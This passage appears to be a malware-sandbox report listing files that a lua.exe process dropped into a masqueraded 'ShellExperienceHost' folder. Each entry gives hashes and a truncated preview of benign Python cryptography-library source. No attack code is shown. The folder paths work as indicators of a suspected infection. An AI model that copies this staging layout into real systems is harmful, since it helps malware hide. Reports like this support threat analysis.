Category:	dropped
Size (bytes):	5730
Entropy (8bit):	4.784227351430539
Encrypted:	false
SSDEEP:	96:F780IID0zn5ihR3B7jrXzn7b0Ap9OY1WlPbiSg8c:FWgQwR3B7jr/oUOYklzg8c
MD5:	58F435E7B4017A4B557F308F9C229550
SHA1:	C56BD3535AA15C38E9AA7F33CAD3D3EDE7604790
SHA-256:	7C5F87039113CFD447F2CF0B07DE2E0E85912CFBF03E46000B9FCACA57A3EAC0
SHA-512:	28B412C304F9A1F51DEB4410A6FB142DEF75D6CC09157DD114F7A80441D71E204809E6670E2CB17E8D9299FB1842D10CE1A87C35F45A4B98760F0A4BDEEAFFB7
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import struct..from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.primitives.ciphers import Cipher.from cryptography.hazmat.primitives.ciphers.algorithms import AES.from cryptography.hazmat.primitives.ciphers.modes import ECB.from cryptography.hazmat.primitives.constant_time import bytes_eq...def _wrap_core(wrapping_key, a, r, backend):. # RFC 3394 Key Wrap - 2.2.1 (index method). encryptor = Cipher(AES(wrapping_key), ECB(), backend).encryptor(). n = len(r). for j in range(6):. for i in range(n):. # every encryption operation is a discrete 16 byte chunk (because. # AES has a 128-bit block size) and since we're using ECB it is. # safe to reuse the encryptor for the

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\padding.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	6173
Entropy (8bit):	4.716902930572581
Encrypted:	false
SSDEEP:	192:F9nQ5XTkljZaX2l5XTHljZTX5qhsTR0hsP:Fuk+hG0+
MD5:	9F794E3808905A7547E29E5D90933025
SHA1:	C2E8204C5253D2D5E1DE296E1639B87790A0B5C1
SHA-256:	CDE2668CF7D7F02C7F82A3B8E450C135EF22376B6B3EBD142F206CCF52A6CAEE
SHA-512:	468C4EDABB99EB0F28AF30FB090DE1A4EC0CF4CD196871D05B4AB15A999CF6B8B518F26C5DEC28647AA5DF3F0560DE5A658956C5862C8BC406F363E9E8222BE7
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc..import six..from cryptography import utils.from cryptography.exceptions import AlreadyFinalized.from cryptography.hazmat.bindings._padding import lib...@six.add_metaclass(abc.ABCMeta).class PaddingContext(object):. @abc.abstractmethod. def update(self, data):. """. Pads the provided bytes and returns any available data as bytes.. """.. @abc.abstractmethod. def finalize(self):. """. Finalize the padding, returns bytes.. """...def _byte_padding_check(block_size):. if not (0 <= block_size <= 2040):. raise ValueError("block_size must be in range(0, 2041).").. if block_size % 8 != 0:. raise ValueError("block_size must be a multiple of 8.")...def _byte_padding_upda

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\poly1305.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1679
Entropy (8bit):	4.606428986724137
Encrypted:	false
SSDEEP:	24:q9O0opQ24kRrQ5pYAr6gorEvoNQHlyScKQw1VNyScKxdbM/SFOyScmpglek+:IDoWm5Q5pYIT0QMXucX2dwKlXmK+
MD5:	11F937619B9AD0C79E87C170E5777853
SHA1:	AE11E9771C21907D45464446968272919391FBCD
SHA-256:	34D0B5598898406349F266E591A1D1C419B53CB75A291CE420BA1CB181F9CE06
SHA-512:	9A5E34E4259182DD21789307F8EA301F6719DC44FA4943E8C7B132C9E2F6270EF26469B8788EC65CE21EB82376F774C03031A344B066EAD82CAEF6E1AFF83356
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function...from cryptography import utils.from cryptography.exceptions import (. AlreadyFinalized,. UnsupportedAlgorithm,. _Reasons,.)...class Poly1305(object):. def __init__(self, key):. from cryptography.hazmat.backends.openssl.backend import backend.. if not backend.poly1305_supported():. raise UnsupportedAlgorithm(. "poly1305 is not supported by this version of OpenSSL.",. _Reasons.UNSUPPORTED_MAC,. ). self._ctx = backend.create_poly1305_ctx(key).. def update(self, data):. if self._ctx is None:. raise AlreadyFinalized("Context was already finalized."). utils._check_byteslike("data", data). self._ctx.update(data).. def finalize(s

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\serialization\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1132
Entropy (8bit):	4.670812625173775
Encrypted:	false
SSDEEP:	24:q9O0opQ2C6wQSqXbb5TlBWbGjbad0uMSiQDkWS8zSA/McwiqJ:IDoWd6GqhDEADS/HZW
MD5:	06967D5A655B7E694501FF268C783E62
SHA1:	81B8320B1728B435F8A7DEE2A83815FA97BE11E7
SHA-256:	78BCE6AA81E05653CAD5A4C68847E9688AD47FD997E4F46B33B20711CF057905
SHA-512:	A5F9B4AC2954E8EC9CCCE8F3869021B9B9AF8D1E173226DACFC1C0BE2D62A431E4E2549853A2969ACEFB4A581895C7449009B67148A8A75BF847F473935508B2
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography.hazmat.primitives.serialization.base import (. BestAvailableEncryption,. Encoding,. KeySerializationEncryption,. NoEncryption,. ParameterFormat,. PrivateFormat,. PublicFormat,. load_der_parameters,. load_der_private_key,. load_der_public_key,. load_pem_parameters,. load_pem_private_key,. load_pem_public_key,.).from cryptography.hazmat.primitives.serialization.ssh import (. load_ssh_private_key,. load_ssh_public_key,.)...__all__ = [. "load_der_parameters",. "load_der_private_key",. "load_der_public_key",. "load_pem_parameters",. "load_pem_private_key",. "load_pem_public_key",. "load_ssh_private_key",. "load_ssh_public_key",. "Encoding",. "PrivateFormat"

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\serialization\base.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2249
Entropy (8bit):	4.987273599813399
Encrypted:	false
SSDEEP:	48:IDoW5W1guR4kI4z4T4J74ig45tC0cGxSM0dCWXO3FCcXy7ngO:FOE4n4z4T4J74ig45wsSMwTX0byrgO
MD5:	C3AE40F32AFAF6DA0B0B578854E5C31F
SHA1:	C410BFAA402405065A3927907023D368938DFB69
SHA-256:	652CD5FB9CE5D81B7F9A68A170FAA27810BA523312AF251A7A1804C6F8D992C8
SHA-512:	4026504BBDC100E43072B60A1D91981A751D8066528504089392E88778241D740D51E00D1A738157F84383471B4806447E8A2AB5F4F1B271618AA85446EA2E49
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc.from enum import Enum..import six..from cryptography import utils.from cryptography.hazmat.backends import _get_backend...def load_pem_private_key(data, password, backend=None):. backend = _get_backend(backend). return backend.load_pem_private_key(data, password)...def load_pem_public_key(data, backend=None):. backend = _get_backend(backend). return backend.load_pem_public_key(data)...def load_pem_parameters(data, backend=None):. backend = _get_backend(backend). return backend.load_pem_parameters(data)...def load_der_private_key(data, password, backend=None):. backend = _get_backend(backend). return backend.load_der_private_key(data, password)...def load_der_public_key(data, backend=None):. backend = _get_

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\serialization\pkcs12.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1853
Entropy (8bit):	4.593048185125155
Encrypted:	false
SSDEEP:	48:IDoWk4V1hhIfNc+/60aNA7IDcXCBMczGkjcsU:Fb4VuD6vDmsU
MD5:	B2838145BECFB6A6E9D507CB54AFC8B2
SHA1:	B4379E068D9C45A78A16E9381346E46A0362ED21
SHA-256:	A09C5A9E002D492B278977E0B8B6A83E07A355C86CF95A424C1756496E2B179E
SHA-512:	FDA8EB26A6C02792A23CE8CFE9CF51F6F5318F1FBBD028D8AA47A1BCD139DF478F92064FD1DA2DD3173E8F50435745A901D3A1E3333DBEFC2F3EB25C1AD95575
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography import x509.from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.primitives import serialization.from cryptography.hazmat.primitives.asymmetric import dsa, ec, rsa...def load_key_and_certificates(data, password, backend=None):. backend = _get_backend(backend). return backend.load_key_and_certificates_from_pkcs12(data, password)...def serialize_key_and_certificates(name, key, cert, cas, encryption_algorithm):. if key is not None and not isinstance(. key,. (. rsa.RSAPrivateKeyWithSerialization,. dsa.DSAPrivateKeyWithSerialization,. ec.EllipticCurvePrivateKeyWithSerialization,. ),. ):. raise TypeError("Key must be RSA, DSA, or Elli

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\serialization\pkcs7.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4625
Entropy (8bit):	4.509198975141802
Encrypted:	false
SSDEEP:	48:IDoWPYN7NufHZxOSgYClBsTrCQ6Ea8JCpqhsAVrb9aCQ6Ea8Xm3Pd7q4Xyx5t82o:FLN7QfHZb64yqzVdw64Xm3Nyxg2FC7C+
MD5:	B88815C85E6BC070D012AF0649B032D3
SHA1:	EA5E5D6AE19B388F1E55096189B5E66F21EF24A8
SHA-256:	BC6970FF647855E2D6B6847191FCFC7CC2C4E62FC209D698F5B12D60C57ADAB9
SHA-512:	2A1C6AD753F45EE2CAF9C52F6F9CF3C4F96F25ED426239E91F20E52AD08D73C987A97D1177F9F8DE9762B2044878E5D4A008196BE277663498300B4FFA60F176
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from enum import Enum..from cryptography import x509.from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.primitives import hashes, serialization.from cryptography.hazmat.primitives.asymmetric import ec, rsa.from cryptography.utils import _check_byteslike...def load_pem_pkcs7_certificates(data):. backend = _get_backend(None). return backend.load_pem_pkcs7_certificates(data)...def load_der_pkcs7_certificates(data):. backend = _get_backend(None). return backend.load_der_pkcs7_certificates(data)...class PKCS7SignatureBuilder(object):. def __init__(self, data=None, signers=[], additional_certs=[]):. self._data = data. self._signers = signers. self._additional_certs = additional_certs..

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\serialization\ssh.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	21682
Entropy (8bit):	4.875548265216809
Encrypted:	false
SSDEEP:	384:FYzSwD/6RYpSWi5xmy1+tl3+0yHmqizUcjUoSVphd1T:Cz/z6RYpSW8If+0yGnrjUPVphjT
MD5:	AB1B83821E3EC259DB3A10064B905C60
SHA1:	1958AF1B96E35A0A5FDD48E792CE00A1AF676BC4
SHA-256:	6BF14A5AEAA91CEF91CD4044A01592E6AED6C8C6704B9E8C0FDD96AFA8F72810
SHA-512:	84B0BB07981CE89AF004451F79C6AC2244D04389C2DB83E6015900722F7E9B4341DCE4B76D7B1AC7AEB2EB603E094907FAA5F2FB3C64944D2EA73C532FC0B76F
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import binascii.import os.import re.import struct..import six..from cryptography import utils.from cryptography.exceptions import UnsupportedAlgorithm.from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.primitives.asymmetric import dsa, ec, ed25519, rsa.from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes.from cryptography.hazmat.primitives.serialization import (. Encoding,. NoEncryption,. PrivateFormat,. PublicFormat,.)..try:. from bcrypt import kdf as _bcrypt_kdf.. _bcrypt_supported = True.except ImportError:. _bcrypt_supported = False.. def _bcrypt_kdf(args, *kwargs):. raise UnsupportedAlgorithm("Need bcrypt module")...try:. from base64 import encodebytes

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\twofactor\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	288
Entropy (8bit):	4.620403958577522
Encrypted:	false
SSDEEP:	6:SbFpbtcMi6O0vgad8pq/ZOwA9lJuzDMABCR1SX5qVVKNo:qD+6O0vgEVhO17yDjCy5gMi
MD5:	40BEDEA5ED7DA1EC6E059A576F6897DB
SHA1:	3CA281A327665C306651682860D7491852555727
SHA-256:	056AE6DC3283A006B6F3513B53F9F3CFCBF8E0E9808979A523270572C7A1C1F1
SHA-512:	8C1947C8296FFE5B5C7E7602B47EE7F8E170B499216EB76CDBDCF24E7C8877B5A4A66E9987BD2AAF7C3B63B82F506C591B4946A272128C47E1A82872357B4E2C
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function...class InvalidToken(Exception):. pass.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\twofactor\hotp.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	4.8325951214494145
Encrypted:	false
SSDEEP:	48:IDoW434sC+HeTzCOPniGCiTUFoIKX/OjIQq:FbFfjIN
MD5:	4BDA688EA5A298D028E7AC6E5099F238
SHA1:	10B542A423BCC2093E869A1B0CFD7314EBCC5D45
SHA-256:	DAE0930931CC16658BF643A303CF74174095AE58ECBCE8C960848A06EA7B1B22
SHA-512:	E2621D8EEE75C7A7581FF6D6A736CBCF05A5FDCA9969E7A65950B2423132C3609FA03A116B914EEF012CA645A1029A2B3BCFFD69289187C586AAB96EA30A475A
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import struct..import six..from cryptography.exceptions import UnsupportedAlgorithm, _Reasons.from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import HMACBackend.from cryptography.hazmat.primitives import constant_time, hmac.from cryptography.hazmat.primitives.hashes import SHA1, SHA256, SHA512.from cryptography.hazmat.primitives.twofactor import InvalidToken.from cryptography.hazmat.primitives.twofactor.utils import _generate_uri...class HOTP(object):. def __init__(. self, key, length, algorithm, backend=None, enforce_key_length=True. ):. backend = _get_backend(backend). if not isinstance(backend, HMACBackend):. raise UnsupportedAlgorithm(.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\twofactor\totp.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1780
Entropy (8bit):	4.6340789498389565
Encrypted:	false
SSDEEP:	24:q9O0opQ2LGAKu6jkCXEl+ZC+VEEv2/NgyTLeTjNaeFXF4pQqyZ/t:IDoWE04sC+HeiyTqT5aKapQqyZ/t
MD5:	48EA1DBC6BA8369180F74C9F5EE85A83
SHA1:	F212E3226D14CA489E95D97E7584F364F590E039
SHA-256:	889453C4F3563DDB1340778F81213A286751354453BF5F3C54DAA9CAF070BC16
SHA-512:	E193A1F7D96A3D9072EED1B1F981E6BC7EEA681B98DDE7DD1BE59D097DBEAAAD96C243DE41177A7F11315840DC487D8948269956A93F4751E2748EFDC071A16E
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography.exceptions import UnsupportedAlgorithm, _Reasons.from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.backends.interfaces import HMACBackend.from cryptography.hazmat.primitives import constant_time.from cryptography.hazmat.primitives.twofactor import InvalidToken.from cryptography.hazmat.primitives.twofactor.hotp import HOTP.from cryptography.hazmat.primitives.twofactor.utils import _generate_uri...class TOTP(object):. def __init__(. self,. key,. length,. algorithm,. time_step,. backend=None,. enforce_key_length=True,. ):. backend = _get_backend(backend). if not isinstance(backend, HMACBackend):. raise UnsupportedAlgorith

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\hazmat\primitives\twofactor\utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	982
Entropy (8bit):	4.599549844621767
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17yDjCy5JsUj/vA8vd/WoQD2lSTgR0F1d8MgmVfYOL9UuJZy7Sh7:q9O0opQ2spVQD2E/F1d3YOxleGhSQV
MD5:	4BF7985F09F9604E3355662AA1685D8D
SHA1:	629127BA295C1A96BF22A3D3AB1D00E8079DD3D9
SHA-256:	64A65238BD9C2EC182B1235FC77918958B7DD40E1B714D70F6EA7610BD61C1A0
SHA-512:	612BF8C62DF159E6F56BF33F239C9B0F14BB523F4EC85E1B5A7A0F6099C454C8BCD4621CE6EB07AA6C0590EF1DFCC08D75EEA40C1CB5456715AAECB0936FE28E
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import base64..from six.moves.urllib.parse import quote, urlencode...def _generate_uri(hotp, type_name, account_name, issuer, extra_parameters):. parameters = [. ("digits", hotp._length),. ("secret", base64.b32encode(hotp._key)),. ("algorithm", hotp._algorithm.name.upper()),. ].. if issuer is not None:. parameters.append(("issuer", issuer)).. parameters.extend(extra_parameters).. uriparts = {. "type": type_name,. "label": (. "%s:%s" % (quote(issuer), quote(account_name)). if issuer. else quote(account_name). ),. "parameters": urlencode(parameters),. }. return "otpauth://{type}/{label}?{parameters}".format(**uriparts).

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\utils.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	4745
Entropy (8bit):	4.5829851957834995
Encrypted:	false
SSDEEP:	96:FW5xKb1g0yyyRqGPdN1REWPdAI34IzaSaMOcqhXlsKy1XcwRof06swc:FWb08y6bPdN31Pdr3vA6cwRoskc
MD5:	95C659D374CC4A15EFE106A83537D33C
SHA1:	069860ACB3F093F5122E802637183C06CA08CED5
SHA-256:	4296602CE0017DE6837223E5AC5F96F2088988E2F603353A0238EAEA1E969336
SHA-512:	6FFAA8B967430D4993ED65EDA0B1BE09E41880EAA6123CA422BEA017091CA1CA9E7D217D7017E848D13516E89081D7E97CD6E1C8B5E40C9CEB65BA98A3E2F65B
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc.import binascii.import inspect.import sys.import warnings...# We use a UserWarning subclass, instead of DeprecationWarning, because CPython.# decided deprecation warnings should be invisble by default..class CryptographyDeprecationWarning(UserWarning):. pass...# Several APIs were deprecated with no specific end-of-life date because of the.# ubiquity of their use. They should not be removed until we agree on when that.# cycle ends..PersistentlyDeprecated2017 = CryptographyDeprecationWarning.PersistentlyDeprecated2019 = CryptographyDeprecationWarning...def _check_bytes(name, value):. if not isinstance(value, bytes):. raise TypeError("{} must be bytes".format(name))...def _check_byteslike(name, value):. try:. mem

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\x509\__init__.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7699
Entropy (8bit):	5.288343621911225
Encrypted:	false
SSDEEP:	192:FcyvCfeOMDUw2szjYMa9nNZSxW6dRUcV4MYcuCAcPg:FkMDUw2zNZS5UK4su3cPg
MD5:	0A599DA4C0F6E5B33F035E26EC07BF94
SHA1:	EB5877D6E5AB13760FCDB67BA70798499F290B65
SHA-256:	D63B851FE9EF2D2EE4534C79D9530DEE937AB3B1F9E58F3A36A52CCDA061862E
SHA-512:	0715303017B7A185534F2B7FF97AA2FC970B6F4CBD10CFE38D49B80F4CD5892DC5BAC14F5A69C72BFF46F06E84DF6F0BF2A1A8A9E5424DF951786C881ABABFDD
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from cryptography.x509 import certificate_transparency.from cryptography.x509.base import (. AttributeNotFound,. Certificate,. CertificateBuilder,. CertificateRevocationList,. CertificateRevocationListBuilder,. CertificateSigningRequest,. CertificateSigningRequestBuilder,. InvalidVersion,. RevokedCertificate,. RevokedCertificateBuilder,. Version,. load_der_x509_certificate,. load_der_x509_crl,. load_der_x509_csr,. load_pem_x509_certificate,. load_pem_x509_crl,. load_pem_x509_csr,. random_serial_number,.).from cryptography.x509.extensions import (. AccessDescription,. AuthorityInformationAccess,. AuthorityKeyIdentifier,. BasicConstraints,. CRLDistributionPoints,. CRLNumber,

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\x509\base.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	26409
Entropy (8bit):	4.369476505930198
Encrypted:	false
SSDEEP:	384:Fp4R5W1gkyTYk0SCZWhr4TdMEW0hZrIaqi:bgDTL0+2RW0Hcaqi
MD5:	3922843BE9387AC95C5E9DA64B1C6827
SHA1:	D47DA5DFE4E15DAEB6707C5E23E61BF055EBAEF2
SHA-256:	6EEAD6BD6528B8F88FCE63D4CCD654CC47BAE2047E58C90DCA20E98D80AF11CF
SHA-512:	0BE5F03564E60B7CE02695540645AA6379607117A7428FA7B15938DCAAB3E2B41981FEA7EBFAFB9E0480AB5CB2592B5DB3EF3E84E7C99A51FD93731228AB8AFC
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc.import datetime.import os.from enum import Enum..import six..from cryptography import utils.from cryptography.hazmat.backends import _get_backend.from cryptography.hazmat.primitives.asymmetric import (. dsa,. ec,. ed25519,. ed448,. rsa,.).from cryptography.x509.extensions import Extension, ExtensionType.from cryptography.x509.name import Name.from cryptography.x509.oid import ObjectIdentifier..._EARLIEST_UTC_TIME = datetime.datetime(1950, 1, 1)...class AttributeNotFound(Exception):. def __init__(self, msg, oid):. super(AttributeNotFound, self).__init__(msg). self.oid = oid...def _reject_duplicate_extension(extension, extensions):. # This is quadratic in the number of extensions. for e in extensi

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\x509\certificate_transparency.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1000
Entropy (8bit):	4.63720931072193
Encrypted:	false
SSDEEP:	12:qD+6O0vgEVhO17yDjCy5JR4pXBbt/R2LQ1R74SGuvjyiF3q7Me0ahgMgZk0Gms3B:q9O0opQ2aW1tp+mFLq78uCWm+l
MD5:	99891A0C8A4B9D04471024E6EE3470E2
SHA1:	903483490B28DA7DAF824BD46384400EE1B5CAC7
SHA-256:	789F65AC84DDC8C9F85ECADC55DAD3685548FD147B997FD5CCC67289A1296E9B
SHA-512:	8312C348A7056A5158A4BA92B4079FA8718DB3BBC9BC309D21DE19FD8021B34941239609115701F198F9845078617972EABCFFC0B4552E003EB380F8386BBB77
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc.from enum import Enum..import six...class LogEntryType(Enum):. X509_CERTIFICATE = 0. PRE_CERTIFICATE = 1...class Version(Enum):. v1 = 0...@six.add_metaclass(abc.ABCMeta).class SignedCertificateTimestamp(object):. @abc.abstractproperty. def version(self):. """. Returns the SCT version.. """.. @abc.abstractproperty. def log_id(self):. """. Returns an identifier indicating which log this SCT is for.. """.. @abc.abstractproperty. def timestamp(self):. """. Returns the timestamp for this SCT.. """.. @abc.abstractproperty. def entry_type(self):. """. Returns whether this is an SCT for a certificate or pre-certificate.. """.

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\x509\extensions.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	52924
Entropy (8bit):	4.454544516904033
Encrypted:	false
SSDEEP:	384:FDBOE0gwXIoS2qy7XHDglKGhF5K0o6S4z1AHuUgP/OGy5UOjR7ceekX/hwkzKaC3:5BOE0NXIwCvoKRG95UJjexNk
MD5:	6E48A176E864E93FBE7B0A2C60BC4F96
SHA1:	3DCBA7C47E39321DBB15D0930C295743F858DE9C
SHA-256:	1CEC1808A032FB8A8AE5E596601E149C97A30BD46EDC505032C2D7A1D6AC47D6
SHA-512:	359CBCDD50CF932F370CAFF00F9392AE7C0356BBA8C1769B44A9B0307DF3DF18721D51A60575EEDDDDC477C923B35CCBCF578834C754A6012D9F375CAB20E789
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc.import datetime.import hashlib.import ipaddress.from enum import Enum..import six..from cryptography import utils.from cryptography.hazmat._der import (. BIT_STRING,. DERReader,. OBJECT_IDENTIFIER,. SEQUENCE,.).from cryptography.hazmat.primitives import constant_time, serialization.from cryptography.hazmat.primitives.asymmetric.ec import EllipticCurvePublicKey.from cryptography.hazmat.primitives.asymmetric.rsa import RSAPublicKey.from cryptography.x509.certificate_transparency import (. SignedCertificateTimestamp,.).from cryptography.x509.general_name import GeneralName, IPAddress, OtherName.from cryptography.x509.name import RelativeDistinguishedName.from cryptography.x509.oid import (. CRLEntryExtensionOID,. E

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\x509\general_name.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7942
Entropy (8bit):	4.46327167344932
Encrypted:	false
SSDEEP:	192:FN/VzxpuL0Ytj5DuuLyYTj54UuLiyj5EP6f3j5gKFOIEdj5pZKj5p0iVjw:F+Tt1lT4WyN3RKRKDVc
MD5:	CA4DADBFFCDBD6992723D36E79522308
SHA1:	ECDF1FD7225152330BC2DC8D3A1CD969B0B1D091
SHA-256:	9CD206FBEAC9F93CD1124844ABBDBB15EDED8EFC557E55BB88F20C8C9B3A2EB2
SHA-512:	AAF3CA7D8765EF2FB7143235700ADB4164EBB3ABD246FA2606E7858DA189C29D7E86FB7F2C0E160EABED2C3577533A2A5FDC178CAF484EDE33BCE45D44FA573F
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..import abc.import ipaddress.from email.utils import parseaddr..import six..from cryptography import utils.from cryptography.x509.name import Name.from cryptography.x509.oid import ObjectIdentifier..._GENERAL_NAMES = {. 0: "otherName",. 1: "rfc822Name",. 2: "dNSName",. 3: "x400Address",. 4: "directoryName",. 5: "ediPartyName",. 6: "uniformResourceIdentifier",. 7: "iPAddress",. 8: "registeredID",.}...class UnsupportedGeneralNameType(Exception):. def __init__(self, msg, type):. super(UnsupportedGeneralNameType, self).__init__(msg). self.type = type...@six.add_metaclass(abc.ABCMeta).class GeneralName(object):. @abc.abstractproperty. def value(self):. """. Return the value of the objec

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\x509\name.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8291
Entropy (8bit):	4.8157887774589305
Encrypted:	false
SSDEEP:	192:F/wGn3vZ7ZbjEdAJgFS+C1ESj4vlUWYcHaneD0qZ7b0s8SGL:FVY6gFS9p8mZ29Z/0xSs
MD5:	74BB582A906CB0267DD112C916E6E3DA
SHA1:	C903144250754A37B5A8D6C98798207B7C9F191D
SHA-256:	8F692175E7BC8D00646D9778455EB48E2F15D199E06EC074EE2E5C9DF94304F9
SHA-512:	F5A355D6973FD89B89BA1A6FEB715684E4B51CFA90E88B51327E1B9E6EA1238DB13DFD74725B6838F77B190969AF5BBDEFFD3C72E255332FE7C670CFF8D92489
Malicious:	false
Preview:	# This file is dual licensed under the terms of the Apache License, Version.# 2.0, and the BSD License. See the LICENSE file in the root of this repository.# for complete details...from __future__ import absolute_import, division, print_function..from enum import Enum..import six..from cryptography import utils.from cryptography.hazmat.backends import _get_backend.from cryptography.x509.oid import NameOID, ObjectIdentifier...class _ASN1Type(Enum):. UTF8String = 12. NumericString = 18. PrintableString = 19. T61String = 20. IA5String = 22. UTCTime = 23. GeneralizedTime = 24. VisibleString = 26. UniversalString = 28. BMPString = 30..._ASN1_TYPE_TO_ENUM = {i.value: i for i in _ASN1Type}._SENTINEL = object()._NAMEOID_DEFAULT_TYPE = {. NameOID.COUNTRY_NAME: _ASN1Type.PrintableString,. NameOID.JURISDICTION_COUNTRY_NAME: _ASN1Type.PrintableString,. NameOID.SERIAL_NUMBER: _ASN1Type.PrintableString,. NameOID.DN_QUALIFIER: _ASN1Type.PrintableString,. N

C:\ProgramData\ShellExperienceHost\Lib\site-packages\cryptography\x509\ocsp.py Download File
Process:	C:\ProgramData\lua\lua.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	13245
Entropy (8bit):	4.470608652505934
